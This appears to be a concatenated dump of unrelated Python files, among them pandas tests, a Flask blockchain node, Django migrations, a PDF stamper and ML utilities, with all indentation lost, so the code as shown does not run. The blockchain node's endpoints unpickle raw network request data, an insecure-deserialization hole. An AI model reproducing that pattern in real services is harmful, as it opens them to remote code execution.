(Timedelta(10, unit='s'), "Timedelta('0 days 00:00:10')"),
(Timedelta(10, unit='ms'), "Timedelta('0 days 00:00:00.010000')"),
(Timedelta(-10, unit='ms'), "Timedelta('-1 days +23:59:59.990000')")])
def test_repr(td, expected_repr):
assert repr(td) == expected_repr
@pytest.mark.parametrize('td, expected_iso', [
(Timedelta(days=6, minutes=50, seconds=3, milliseconds=10, microseconds=10,
nanoseconds=12), 'P6DT0H50M3.010010012S'),
(Timedelta(days=4, hours=12, minutes=30, seconds=5), 'P4DT12H30M5S'),
(Timedelta(nanoseconds=123), 'P0DT0H0M0.000000123S'),
# trim nano
(Timedelta(microseconds=10), 'P0DT0H0M0.00001S'),
# trim micro
(Timedelta(milliseconds=1), 'P0DT0H0M0.001S'),
# don't strip every 0
(Timedelta(minutes=1), 'P0DT0H1M0S')])
def test_isoformat(td, expected_iso):
assert td.isoformat() == expected_iso
|
python
|
from flask import Blueprint, jsonify, request
from threading import Thread, Lock, Event
from copy import deepcopy
from node import Node
import pickle
import config
import random
import time
node = Node()
rest_api = Blueprint('rest_api', __name__)
# ------------------------------------------
# ------------- Node endpoints -------------
# ------------------------------------------
@rest_api.route('/register_node', methods=['POST'])
def register_node():
# registers node to the ring (only called by bootstrap node)
node_public_key = request.form.get('public_key')
node_ip = request.form.get('ip')
node_port = request.form.get('port')
node_id = len(node.ring)
node.register_node_to_ring(node_id, node_ip, node_port, node_public_key, 0, [])
if len(node.ring) == config.NUMBER_OF_NODES:
# bootstrap node sends the ring and chain to all other nodes
def init():
node.broadcast('/receive_ring_and_chain', obj=pickle.dumps((deepcopy(node.ring), deepcopy(node.chain))))
for n in node.ring:
if n['id'] != 0:
node.create_transaction(n['public_key'], 100)
time.sleep(random.random() * 3)
Thread(target=init).start()
return jsonify({'id': node_id}), 200
@rest_api.route('/receive_ring_and_chain', methods=['POST'])
def share_ring_and_chain():
# receive bootstrap's node ring and chain, only called by bootstrap node on startup
(ring, chain) = pickle.loads(request.get_data())
node.ring = ring
node.chain = chain
return jsonify({'message': "OK"}), 200
@rest_api.route('/register_transaction', methods=['POST'])
def register_transaction():
# adds incoming transaction to block if valid
transaction = pickle.loads(request.get_data())
# check if transaction is already on the blockchain
new = True
for block in node.chain.blocks:
for t in block.transactions:
if transaction.transaction_id == t.transaction_id:
new = False
if node.validate_transaction(transaction) and new:
# update wallet UTXOs
node.update_wallet(transaction)
# update ring balance and utxos
node.update_ring(transaction)
# add transaction to block
node.pending_transactions.append(transaction)
return jsonify({'message': "OK"}), 200
else:
return jsonify({'message': "The transaction is invalid or is already on the blockchain"}), 401
@rest_api.route('/register_block', methods=['POST'])
def register_block():
# adds incoming block to the chain if valid
node.pause_thread.set()
node.block_lock.acquire()
block = pickle.loads(request.get_data())
if block.index == node.chain.blocks[-1].index + 1 and node.chain.add_block(block):
node.write_block_time()
# remove mutual transactions between pending and block
pending = set([t.transaction_id for t in node.pending_transactions])
block_transactions = set([t.transaction_id for t in block.transactions])
node.pending_transactions = [t for t in node.pending_transactions if t.transaction_id in (pending - block_transactions)]
transactions_to_register = [t for t in block.transactions if t.transaction_id in (block_transactions - pending)]
# for transactions that are not in pending list, register
for transaction in transactions_to_register:
# update wallet UTXOs
node.update_wallet(transaction)
# update ring balance and utxos
node.update_ring(transaction)
else:
node.resolve_conflicts()
node.block_lock.release()
node.pause_thread.clear()
return jsonify({'message': "OK"}), 200
@rest_api.route('/send_chain_and_id', methods=['GET'])
def send_chain_and_id():
# sends a copy of the chain and id of this node
return pickle.dumps((deepcopy(node.chain), deepcopy(node.id)))
@rest_api.route('/send_ring_and_pending_transactions', methods=['GET'])
def send_ring_and_pending_transactions():
# sends a copy of the ring and pending transactions list of this node
return pickle.dumps((deepcopy(node.ring), deepcopy(node.pending_transactions)))
# ------------------------------------------
# -------------- CLI endpoints -------------
# ------------------------------------------
@rest_api.route('/create_new_transaction', methods=['POST'])
def create_new_transaction():
# creates new transaction
(receiver_id, amount) = pickle.loads(request.get_data())
receiver_address = None
for n in node.ring:
if receiver_id == n['id']:
receiver_address = n['public_key']
if receiver_address != None and receiver_address != node.wallet.public_key:
if node.create_transaction(receiver_address, amount):
return jsonify({'message': "OK"}), 200
else:
return jsonify({'message': "Transaction failed. Not enough coins or signature is invalid."}), 402
elif receiver_address == None:
return jsonify({'message': "Transaction failed. There is no node with the given ID."}), 403
else:
return jsonify({'message': "Transaction failed. You cannot send coins to yourself."}), 404
@rest_api.route('/view_last_transactions', methods=['GET'])
def view_last_transactions():
# returns the transactions that are in the last validated block of the chain
return pickle.dumps(node.chain.blocks[-1].transactions)
@rest_api.route('/get_balance', methods=['GET'])
def get_balance():
# returns the balance of this node's wallet
for n in node.ring:
if n['id'] == node.id:
return pickle.dumps(n['balance'])
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-24 10:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("timeline_logger", "0001_initial"),
]
operations = [
migrations.AlterModelOptions(
name="timelinelog",
options={
"verbose_name": "timeline log entry",
"verbose_name_plural": "timeline log entries",
},
),
]
|
python
|
#!/usr/bin/python3
import fitz, shutil
from fitz.utils import getColor
from os import listdir
from os.path import isdir, isfile, join
import PySimpleGUI as sg
print = sg.EasyPrint
help_lisc_input = "Ce logiciel est soumis à la licence GPL v2, (c) Jodobear 2019.\n\nMentionner uniquement le dossier comprenant les fichiers pdf."
help_num = "Pour tampons numérotés: Le numéro de tampon correspond au trois premiers caractères du nom de fichier.\nPar exemple, un fichier nommé <<A14-Défense>> aura pour tampon <<A14>>.\nMettre éventuellement <<Pièce n°>> en 3e ligne pour obtenir <<Pièce n° A14>>.\n"
help_thanks = "Merci d'utiliser ce logiciel. Si vous avez des problèmes ou voulez contribuer à son développement, voir\nhttps://github.com/jodobear/pdf-stamper"
help_donation = "Pour faire un don au développeur du projet, voir https://tallyco.in/jodobear \n"
fonts = ["Helvetica", "Helvetica-Oblique", "Helvetica-Bold",
"Helvetica-BoldOblique", "Courier", "Courier-Oblique",
"Courier-Bold", "Courier-BoldOblique", "Times-Roman",
"Times-Italic", "Times-Bold", "Times-BoldItalic"]
colors = {"Noir": getColor("black"), "Blanc": getColor("white"),
"Rouge": getColor("red"), "Bleu": getColor("blue")}
layout = [
[sg.T("Appuyer sur 'Aide' pour instructions.")],
[sg.T('Dossier à tamponner:',
size=(18, 1)), sg.In(), sg.FolderBrowse("Parcourir", size=(10, 1))],
[sg.T("Dossier d'enregistrement:", size=(18, 1)),
sg.InputText(), sg.FolderBrowse("Parcourir", size=(10, 1))],
[sg.T('1e ligne du tampon:', size=(18, 2)), sg.In()],
[sg.T('2e ligne du tampon:', size=(18, 2)), sg.In()],
[sg.T('3e ligne du tampon:', size=(18, 2)), sg.In()],
[sg.Frame(layout=[
[sg.Radio('Tamponner toutes les pages', "RADIO1", default=True, size=(24, 1)),
sg.Radio('Tamponner la page n°', "RADIO1"), sg.In(size=(3, 1))],
[sg.Checkbox('Numéroter les tampons', size=(18, 1), default=False),
sg.T('Police:'), sg.InputCombo((fonts), size=(18, 1)),
sg.T('Couleur:'), sg.InputCombo((list(colors.keys())), size=(6, 1))]],
title='Options', title_color='red', relief=sg.RELIEF_SUNKEN, tooltip='Utiliser ceci pour régler les options')],
[sg.Submit("Tamponner"),
sg.Cancel("Annuler"), sg.T(' ' * 76),
sg.Help("Aide", size=(10, 1), button_color=('black', 'orange'))]
]
window = sg.Window('Tampon 2 PDF : tampons numériques numérotés et non numérotés', layout)
jobNo = 1
while True:
event, value_list = window.Read()
if event is None or event == 'Annuler':
break
if event == 'Aide':
sg.Popup('Aide pour pdfstamper_win0.2-fr',
help_lisc_input, help_num, help_thanks, help_donation)
continue
print("Numéro de tache:", jobNo)
input_path = value_list[0]
output_path = value_list[1]
line_one = value_list[2]
line_two = value_list[3]
line_three = value_list[4]
stampAll = value_list[5]
stampPage = value_list[6]
pageNo = value_list[7]
stampNumbers = value_list[8]
font = value_list[9]
color = colors[value_list[10]]
maxstring = 4 + max(len(line_one), len(line_two), len(line_three))
leftwidth = 26 + (7 * maxstring)
# debug output of the selected job.
if stampAll:
print("Tamponnage de toutes les pages.")
else:
print("Tamponnage de la page n°:", f'{pageNo}')
if stampNumbers:
print("Tampons numérotés.")
else:
print('Tampons non numérotés.')
print("Dossier à tamponner: ", input_path,
"\nDossier d'enregistrement: ", output_path)
input_files = [f for f in listdir(input_path)
if isfile(join(input_path, f))]
output_files = []
# debug output of input files.
print('\n', "Fichiers à tamponner: ")
for i in range(len(input_files)):
print(i + 1, input_files[i])
def draw(page):
'''This function draws the stamp.'''
box = fitz.Rect(page.rect.width - leftwidth,
page.rect.height - 65,
page.rect.width - 25,
page.rect.height - 20)
page.drawRect(box, color=colors["Noir"], fill=colors["Blanc"], overlay=True)
page.insertTextbox(
box, text, color=color, align=1, fontname=font, border_width=2)
# calling draw and stamping.
for f in input_files:
doc = fitz.open(f"{input_path}/{f}")
text = [f"{line_one}", f"{line_two}", f"{line_three}"]
if stampNumbers:
text[2] = f"{line_three} " f"{f[:3]}"
if stampAll:
for page in doc:
draw(page)
else:
draw(doc[int(pageNo) - 1])
doc.save(f"{f}")
output_files.append(f)
def output(output_path):
'''This function moves the files to output folder.'''
for f in output_files:
shutil.move(f, output_path)
output(output_path)
# debug output of processed files and output folder.
print('\n', "Fichiers tamponnés: ")
for i in range(len(output_files)):
print(i + 1, output_files[i])
print('\n', "Les fichiers tamponnées se trouvent ici: ", f"{output_path}", '\n\n')
jobNo += 1
window.Close()
|
python
|
from torch.optim.lr_scheduler import LambdaLR
class Scheduler(object):
"""Simple container for warmup and normal scheduler."""
def __init__(self, normal_schededuler, warmup_scheduler=None):
self.warmup = warmup_scheduler
self.sched = normal_schededuler
def get_last_lr(self):
""" Return last computed learning rate by current scheduler."""
if self.warmup is not None and not self.warmup.complete:
return self.warmup.get_last_lr()
return self.sched.get_last_lr()
def state_dict(self):
"""Returns the state of each scheduler as a :class:`dict`."""
state_dict = {
'warmup': self.warmup.state_dict() if self.warmup is not None else {},
'sched': self.sched.state_dict(),
}
return state_dict
def load_state_dict(self, state_dict):
"""Loads the schedulers state.
Arguments:
state_dict (dict): scheduler state. Should be an object returned
from a call to :meth:`state_dict`.
"""
if self.warmup:
self.warmup.load_state_dict(state_dict['warmup'])
self.sched.load_state_dict(state_dict['sched'])
def step(self, *args, **kwargs):
if self.warmup is not None and not self.warmup.complete:
return self.warmup.step(*args, **kwargs)
return self.sched.step(*args, **kwargs)
class LinearWarmup(LambdaLR):
""" Linear warmup and then constant.
Linearly increases learning rate schedule from 0 to 1 over `warmup_steps` training steps.
Keeps learning rate schedule equal to 1. after warmup_steps.
From https://bit.ly/39o2W1f
"""
def __init__(self, optimizer, warmup_steps, last_epoch=-1):
self.warmup_steps = warmup_steps
self.complete = False
super(LinearWarmup, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
self.complete = True
return 1.
|
python
|
"""
Pyncette ships with an optional Prometheus instrumentation based on the official prometheus_client
Python package. It includes the following metrics:
- Tick duration [Histogram]
- Tick volume [Counter]
- Tick failures [Counter]
- Number of currently executing ticks [Gauge]
- Task duration [Histogram]
- Task volume [Counter]
- Task failures [Counter]
- Number of currently executing tasks [Gauge]
- Task run staleness (i.e. how far behind the scheduled time the actual executions are) [Histogram]
- Repository operation duration [Histogram]
- Repository operation volume [Counter]
- Repository operation volume [Failures]
- Number of currently repository operations [Gauge]
It pushes the metrics to default registry (prometheus_client.REGISTRY), so it can be combined with other
code alongside it.
To see the exported metrics while running this example, use something like
curl localhost:9699/metrics
"""
import asyncio
import datetime
import logging
import random
import uuid
from prometheus_client import start_http_server
from pyncette import Context
from pyncette import FailureMode
from pyncette import Pyncette
from pyncette.prometheus import use_prometheus
logger = logging.getLogger(__name__)
app = Pyncette()
use_prometheus(app)
@app.task(schedule="* * * * * */2")
async def hello_world(context: Context) -> None:
logger.info("Hello, world!")
@app.task(schedule="* * * * * */2")
async def sleepy_time(context: Context) -> None:
logger.info("Hello, bed!")
await asyncio.sleep(random.random() * 5)
@app.task(schedule="* * * * * */2", failure_mode=FailureMode.UNLOCK)
async def oopsie_daisy(context: Context) -> None:
if random.choice([True, False]):
raise Exception("Something went wrong :(")
@app.dynamic_task()
async def execute_once(context: Context) -> None:
logger.info(f"Hello, world from {context.task}")
await context.app_context.unschedule_task(context.task)
@app.task(interval=datetime.timedelta(seconds=1))
async def schedule_execute_once(context: Context) -> None:
await context.app_context.schedule_task(
execute_once, str(uuid.uuid4()), interval=datetime.timedelta(seconds=1)
)
if __name__ == "__main__":
start_http_server(port=9699, addr="0.0.0.0")
app.main()
|
python
|
from alc import dyn
# example of metadata to be added in VSD WAN Service:
# "rd=3:3,vprnAS=65000,vprnRD=65000:1,vprnRT=target:65000:1,vprnLo=1.1.1.1"
# example of tools cli to test this script: tools perform service vsd evaluate-script domain-name "l3dom1" type vrf-vxlan action setup policy "py-vrf-vxlan" vni 1234 rt-i target:3:3 rt-e target:3:3 metadata "rd=3:3,vprnAS=65000,vprnRD=65000:1,vprnRT=target:65000:1,vprnLo=1.1.1.1"
# teardown example cli: tools perform service vsd evaluate-script
# domain-name "l3dom1" type vrf-vxlan action teardown policy
# "py-vrf-vxlan" vni 1234 rt-i target:3:3 rt-e target:3:3
def setup_script(vsdParams):
print ("These are the VSD params: " + str(vsdParams))
servicetype = vsdParams['servicetype']
vni = vsdParams['vni']
rt = vsdParams['rt']
# add "target:" if provisioned by VSD (VSD uses x:x format whereas tools
# command uses target:x:x format)
if not rt.startswith('target'):
rt = "target:" + rt
metadata = vsdParams['metadata']
# remove trailing space at the end of the metadata
metadata = metadata.rstrip()
print ("VSD metadata" + str(metadata))
metadata = dict(e.split('=') for e in metadata.split(','))
print ("Modified metadata" + str(metadata))
vplsSvc_id = dyn.select_free_id("service-id")
vprnSvc_id = dyn.select_free_id("service-id")
print ("this are the free svc ids picked up by the system: VPLS:" +
vplsSvc_id + " + VPRN:" + vprnSvc_id)
if servicetype == "VRF-VXLAN":
rd = metadata['rd']
vprn_AS = metadata['vprnAS']
vprn_RD = metadata['vprnRD']
vprn_RT = metadata['vprnRT']
vprn_Lo = metadata['vprnLo']
print (
'servicetype, VPLS id, rt, vni, rd, VPRN id, vprn_AS, vprn_RD, vprn_RT, vprn_Lo:',
servicetype,
vplsSvc_id,
rt,
vni,
rd,
vprnSvc_id,
vprn_AS,
vprn_RD,
vprn_RT,
vprn_Lo)
dyn.add_cli("""
configure service
vpls %(vplsSvc_id)s customer 1 name l3-backhaul-vpls%(vplsSvc_id)s create
allow-ip-int-bind vxlan-ipv4-tep-ecmp
exit
description vpls%(vplsSvc_id)s
bgp
route-distinguisher %(rd)s
route-target %(rt)s
exit
vxlan vni %(vni)s create
exit
bgp-evpn
ip-route-advertisement
vxlan
no shut
exit
exit
no shutdown
exit
exit
exit
configure service
vprn %(vprnSvc_id)s customer 1 create
autonomous-system %(vprn_AS)s
route-distinguisher %(vprn_RD)s
auto-bind-tunnel resolution any
vrf-target %(vprn_RT)s
interface "vpls-%(vplsSvc_id)s" create
vpls "vpls%(vplsSvc_id)s" evpn-tunnel
exit
interface "lo1" create
address %(vprn_Lo)s/32
loopback
exit
no shutdown
exit
exit
""" % {'vplsSvc_id': vplsSvc_id, 'vprnSvc_id': vprnSvc_id, 'vni': vsdParams['vni'], 'rt': rt, 'rd': metadata['rd'], 'vprn_AS': vprn_AS, 'vprn_RD': vprn_RD, 'vprn_RT': vprn_RT, 'vprn_Lo': vprn_Lo})
# VRF-VXLAN returns setupParams: vplsSvc_id, vprnSvc_id, servicetype,
# vni, vprn_AS, vprn_RD, vprn_RT, vprn_Lo
return {
'vplsSvc_id': vplsSvc_id,
'vprnSvc_id': vprnSvc_id,
'servicetype': servicetype,
'vni': vni,
'vprn_AS': vprn_AS,
'vprn_RD': vprn_RD,
'vprn_RT': vprn_RT,
'vprn_Lo': vprn_Lo}
# ------------------------------------------------------------------------------------------------
def teardown_script(setupParams):
print ("These are the teardown_script setupParams: " + str(setupParams))
servicetype = setupParams['servicetype']
if servicetype == "VRF-VXLAN":
print ("Test1")
print ("These are the teardown_script setupParams: " + str(setupParams))
dyn.add_cli("""
configure service
vpls %(vplsSvc_id)s
bgp-evpn
vxlan
shut
exit
no evi
exit
no vxlan vni %(vni)s
no bgp-evpn
shutdown
exit
no vpls %(vplsSvc_id)s
vprn %(vprnSvc_id)s
interface lo1 shutdown
no interface lo1
interface "vpls-%(vplsSvc_id)s"
vpls "vpls%(vplsSvc_id)s"
no evpn-tunnel
exit
no vpls
shutdown
exit
no interface "vpls-%(vplsSvc_id)s"
shutdown
exit
no vprn %(vprnSvc_id)s
exit
""" % {'vplsSvc_id': setupParams['vplsSvc_id'], 'vprnSvc_id': setupParams['vprnSvc_id'], 'vni': setupParams['vni']})
return setupParams
d = {"script": (setup_script, None, None, teardown_script)}
dyn.action(d)
|
python
|
from abaqusConstants import *
from .GeometricRestriction import GeometricRestriction
from ..Region.Region import Region
class SlideRegionControl(GeometricRestriction):
"""The SlideRegionControl object defines a slide region control geometric restriction.
The SlideRegionControl object is derived from the GeometricRestriction object.
Notes
-----
This object can be accessed by:
.. code-block:: python
import optimization
mdb.models[name].optimizationTasks[name].geometricRestrictions[name]
"""
def __init__(self, name: str, clientDirection: tuple, region: Region,
approach: SymbolicConstant = FREE_FORM, csys: int = None, freeFormRegion: str = None,
presumeFeasibleRegionAtStart: Boolean = ON, revolvedRegion: str = None,
tolerance1: float = 0, tolerance2: float = 0, tolerance3: float = 0):
"""This method creates a SlideRegionControl object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].optimizationTasks[name].SlideRegionControl
Parameters
----------
name
A String specifying the geometric restriction repository key.
clientDirection
A VertexArray object of length 2 specifying the axis of revolution. Instead of through a
ConstrainedSketchVertex, each point may be specified through a tuple of coordinates. This is used when
*approach* is TURN.
region
A Region object specifying the region to which the geometric restriction is applied.
When used with a TopologyTask, there is no default value. When used with a ShapeTask,
the default value is MODEL.
approach
A SymbolicConstant specifying the restriction approach. The SymbolicConstant FREE_FORM
indicates a free-form slide region, and the SymbolicConstant TURN indicates that the
restriction should conserve a turnable surface. Possible values are FREE_FORM and TURN.
The default value is FREE_FORM.
csys
None or a DatumCsys object specifying the local coordinate system. If *csys*=None, the
global coordinate system is used. When this member is queried, it returns an Int. This
is used when *approach* is TURN. The default value is None.
freeFormRegion
None or a Region object specifying the free-form region. This is used when *approach* is
FREE_FORM. The default value is None.
presumeFeasibleRegionAtStart
A Boolean specifying whether to ignore the geometric restriction in the first design
cycle. The default value is ON.
revolvedRegion
None or a Region object specifying the region to revolve into a slide region. This is
used when *approach* is TURN. The default value is None.
tolerance1
A Float specifying the geometric tolerance in the 1-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance2
A Float specifying the geometric tolerance in the 2-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance3
A Float specifying the geometric tolerance in the 3-direction. This is used when
*approach* is TURN. The default value is 0.01.
Returns
-------
A SlideRegionControl object.
"""
super().__init__()
pass
def setValues(self, approach: SymbolicConstant = FREE_FORM, csys: int = None, freeFormRegion: str = None,
presumeFeasibleRegionAtStart: Boolean = ON, revolvedRegion: str = None,
tolerance1: float = 0, tolerance2: float = 0, tolerance3: float = 0):
"""This method modifies the SlideRegionControl object.
Parameters
----------
approach
A SymbolicConstant specifying the restriction approach. The SymbolicConstant FREE_FORM
indicates a free-form slide region, and the SymbolicConstant TURN indicates that the
restriction should conserve a turnable surface. Possible values are FREE_FORM and TURN.
The default value is FREE_FORM.
csys
None or a DatumCsys object specifying the local coordinate system. If *csys*=None, the
global coordinate system is used. When this member is queried, it returns an Int. This
is used when *approach* is TURN. The default value is None.
freeFormRegion
None or a Region object specifying the free-form region. This is used when *approach* is
FREE_FORM. The default value is None.
presumeFeasibleRegionAtStart
A Boolean specifying whether to ignore the geometric restriction in the first design
cycle. The default value is ON.
revolvedRegion
None or a Region object specifying the region to revolve into a slide region. This is
used when *approach* is TURN. The default value is None.
tolerance1
A Float specifying the geometric tolerance in the 1-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance2
A Float specifying the geometric tolerance in the 2-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance3
A Float specifying the geometric tolerance in the 3-direction. This is used when
*approach* is TURN. The default value is 0.01.
"""
pass
|
python
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
@File : test_RPSprepare.py
Description :
@Author : pchaos
tradedate: 18-5-16
-------------------------------------------------
Change Activity:
18-5-16:
@Contact : p19992003#gmail.com
-------------------------------------------------
"""
from django.test import TestCase
from stocks.models import Listing, STOCK_CATEGORY
from stocks.models import RPSprepare
import datetime
import random
__author__ = 'pchaos'
class TestRPSprepare(TestCase):
def test_getCodelist(self):
# using quantaxis
oldcount = RPSprepare.getlist('index').count()
# 测试时插入指数基础数据
qs = Listing.importIndexListing()
rps = self.insertRandomRPSprepare(qs[0])
d = rps[0].tradedate
count = RPSprepare.getlist('index').count()
self.assertTrue(count - oldcount > 0, '指数数量应大于0, {}'.format(count - oldcount))
print('数据库中有{}记录。'.format(count))
qsrps = RPSprepare.getlist('index')
self.assertTrue(qsrps[0].tradedate == d, '日期保存失败:{} {}'.format(qsrps[0].tradedate, d))
qsrps.delete()
# 测试tradedate保存
d = (datetime.datetime.now() - datetime.timedelta(300)).date()
querysetlist = []
n = 10
for i in range(n):
rps = RPSprepare(code=qs[1], rps120=i + 1, rps250=1.2, tradedate=d + datetime.timedelta(i + 1))
querysetlist.append(rps)
RPSprepare.objects.bulk_create(querysetlist)
qsrps = RPSprepare.getlist('index')
for i in range(1, n, 1):
self.assertTrue(qsrps[i].tradedate == d + datetime.timedelta(i + 1),
'数据库中{} != {}'.format(qsrps[i].tradedate, d + datetime.timedelta(i + 1)))
self.assertTrue(qsrps[i].rps120 == 1 + i,
'数据库中{} != {}'.format(qsrps[i].rps120, i + 1))
@classmethod
def insertRandomRPSprepare(cls, listing=None, insertCount=1):
""" 随机插入insertCount个RPSprepare
listing为RPSprepare的外键,默认为空时,自动获取listing
:param listing: 对应RPSprepare的外键
:param insertCount: 自动插入的个数
:return: 插入成功的RPSprepare list
"""
if listing is None:
qslist = Listing.importIndexListing()
listing = qslist[random.randint(0, len(qslist) - 1)]
rpslist = []
beforday = insertCount * 2 + 1
d = (datetime.datetime.now() - datetime.timedelta(random.randint(1, beforday))).date()
for i in range(insertCount):
rps = RPSprepare(code=listing, rps120=1.1, rps250=1.2, tradedate=d)
rps.save()
rpslist.append(rps)
assert d == rps.tradedate, '保存前后tradedate: {} : {}'.format(d, rps.tradedate)
d = d + datetime.timedelta(1)
return rpslist
def test_importIndexListing(self):
oldcount = RPSprepare.getlist('index').count()
# 测试时插入指数基础数据
qs = Listing.importIndexListing()
RPSprepare.importIndexListing()
count = RPSprepare.getlist('index').count()
self.assertTrue(count - oldcount > 500, '2018-05 指数数量应大于500, {}'.format(count - oldcount))
print(RPSprepare.getlist('index')[0])
|
python
|
from amigocloud import AmigoCloud
# Use amigocloud version 1.0.5 or higher to login with tokens
# This will raise an AmigoCloudError if the token is invalid or has expired
ac = AmigoCloud(token='<token>')
query = ({
"author": "",
"extra": "",
"layer_name": "0",
"name": "My first baselayer",
"public_tiles": False,
"transparency": False,
"url": "<baselayer URL>",
"zoom_level_max": 20,
"zoom_level_min": 0
})
sql_url='<AmigoCloud baselater API URL>'
response = ac.post(url=sql_url, data=query, content_type="application/json")
print 'Response:', response
|
python
|
#!/usr/bin/env python3
from bank.user import User
from bank.account import Account
carter = User("Carter", 123, 1)
account = Account(123, 1000, "checking")
print("{} has account number {} with a pin number {}".format(carter.name, carter.account, carter.pin_number))
print("{} account with account number {} has balance {}".format(account.type, account.account_number, account.balance))
account.deposit(1000)
print(account.check_balance())
account.withdraw(500)
print(account.check_balance())
print("{} account with account number {} has balance {}".format(account.type, account.account_number, account.balance))
|
python
|
from setuptools import setup, find_packages
setup(
name='s3filesmanager',
version='0.5.3',
description='AWS S3 files manager',
#long_description=open('docs/index.rst').read(),
author='Jeffrey Hu',
author_email='[email protected]',
url='https://github.com/zhiwehu/s3filesmanager',
install_requires=['django >= 1.5',
'South >= 0.7.6',
'django-model-utils >= 1.1.0',
'django-bootstrap-toolkit',
'PIL == 1.1.7',
'sorl-thumbnail >= 11.12',
'boto >= 2.9.0',
'django-storages >= 1.1.8',
],
packages=find_packages(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
include_package_data=True,
zip_safe=False,
)
|
python
|
import sys
sys.path.insert(0, "/work/ml_pipeline/regression_models/")
import regression_models
import numpy as np
from sklearn.model_selection import train_test_split
import pipeline
from processing.data_management import load_dataset, save_pipeline
from config import config
from regression_models import __version__ as _version
import logging
_logger = logging.getLogger(__name__)
def run_training() -> None:
"""Train the model."""
# read training data
data = load_dataset(file_name=config.TRAINING_DATA_FILE)
# divide train and test
X_train, X_test, y_train, y_test = train_test_split(
data[config.FEATURES], data[config.TARGET], test_size=0.1, random_state=0
) # we are setting the seed here
print("Complete Splitting data")
pipeline.lasso_pipe.fit(X_train, y_train)
pipeline.rf_pipe.fit(X_train, y_train)
_logger.info(f"saving model version: {_version}")
#Lasso
save_pipeline(pipeline_to_persist=pipeline.lasso_pipe, model_name= "lasso")
print(pipeline.lasso_pipe)
#random forest
save_pipeline(pipeline_to_persist=pipeline.rf_pipe, model_name = "random_forest")
if __name__ == "__main__":
run_training()
|
python
|
# Generated by Django 2.1.7 on 2019-03-06 19:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('project', '0005_auto_20190220_1112'),
]
operations = [
migrations.AlterField(
model_name='activeproject',
name='project_home_page',
field=models.URLField(blank=True, default=''),
),
migrations.AlterField(
model_name='activeproject',
name='version',
field=models.CharField(default='', max_length=15),
),
migrations.AlterField(
model_name='archivedproject',
name='project_home_page',
field=models.URLField(blank=True, default=''),
),
migrations.AlterField(
model_name='archivedproject',
name='version',
field=models.CharField(default='', max_length=15),
),
migrations.AlterField(
model_name='publishedproject',
name='project_home_page',
field=models.URLField(blank=True, default=''),
),
migrations.AlterField(
model_name='publishedproject',
name='version',
field=models.CharField(default='', max_length=15),
),
]
|
python
|
import numpy as np
from .vice import VICE
from .sac_classifier import SACClassifier
from softlearning.misc.utils import mixup
class VICEGoalConditioned(VICE):
def _timestep_before_hook(self, *args, **kwargs):
# TODO(hartikainen): implement goal setting, something like
# goal = self.pool.get_goal...
# self.env.set_goal(goal)
return super(VICEGoalConditioned, self)._timestep_before_hook(
*args, **kwargs)
def _get_classifier_feed_dict(self):
negatives = self.sampler.random_batch(
self._classifier_batch_size)['observations']
state_goal_size = negatives.shape[1]
assert state_goal_size % 2 == 0, (
"States and goals should be concatenated together,"
" so the total space has to be even.")
state_size = int(state_goal_size / 2)
positives = np.concatenate((
negatives[:, state_size:],
negatives[:, state_size:]
), axis=1)
labels_batch = np.zeros(
(2 * self._classifier_batch_size, 2), dtype=np.int32)
labels_batch[:self._classifier_batch_size, 0] = 1
labels_batch[self._classifier_batch_size:, 1] = 1
observation_batch = np.concatenate([negatives, positives], axis=0)
if self._mixup_alpha > 0:
observation_batch, labels_batch = mixup(
observation_batch, labels_batch, alpha=self._mixup_alpha)
feed_dict = {
self._observations_ph: observation_batch,
self._label_ph: labels_batch
}
return feed_dict
def get_diagnostics(self,
iteration,
batch,
training_paths,
evaluation_paths):
# TODO(avi): figure out some classifier diagnostics that
# don't involve a pre-defined validation set
diagnostics = super(SACClassifier, self).get_diagnostics(
iteration, batch, training_paths, evaluation_paths)
return diagnostics
|
python
|
# (C) Copyright 2015 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import opstestfw
import pexpect
import re
def hostIperfServerStop(** kwargs):
"""
Library function to process information from traffic received using iperf.
:param deviceObj : Device object
:type deviceObj : object
:return: returnStruct Object
data: - Dictionary:
'Client IP': Server IP address
'Client port': Client port
'Server IP': Server IP address
'Server port': Server port
:returnType: object
"""
# Params
deviceObj = kwargs.get('deviceObj', None)
#Variable initialization
retBuffer = ''
# If device is not passed, we need error message
if deviceObj is None:
opstestfw.LogOutput('error', "Need to pass device to configure")
returnJson = opstestfw.returnStruct(returnCode=1)
return returnJson
deviceObj.expectHndl.expect(['# ', pexpect.TIMEOUT], timeout=1)
retBuffer = deviceObj.expectHndl.before
ips_and_ports = re.search(
'local (.*) port (\d+) connected with (.*) port (\d+)',
deviceObj.expectHndl.before)
traffic_data = re.findall(
'sec ([.\d]+ .*?) ([.\d]+ .+)\r', deviceObj.expectHndl.before)
# If client fails result is None and returnList == []
server_ip = None
server_port = None
client_ip = None
client_port = None
if ips_and_ports is not None:
server_ip = ips_and_ports.group(1)
server_port = ips_and_ports.group(2)
client_ip = ips_and_ports.group(3)
client_port = ips_and_ports.group(4)
data_dict = {}
data_dict['Server IP'] = server_ip
data_dict['Server port'] = server_port
data_dict['Client IP'] = client_ip
data_dict['Client port'] = client_port
data_dict['Traffic data'] = traffic_data
command = '\003'
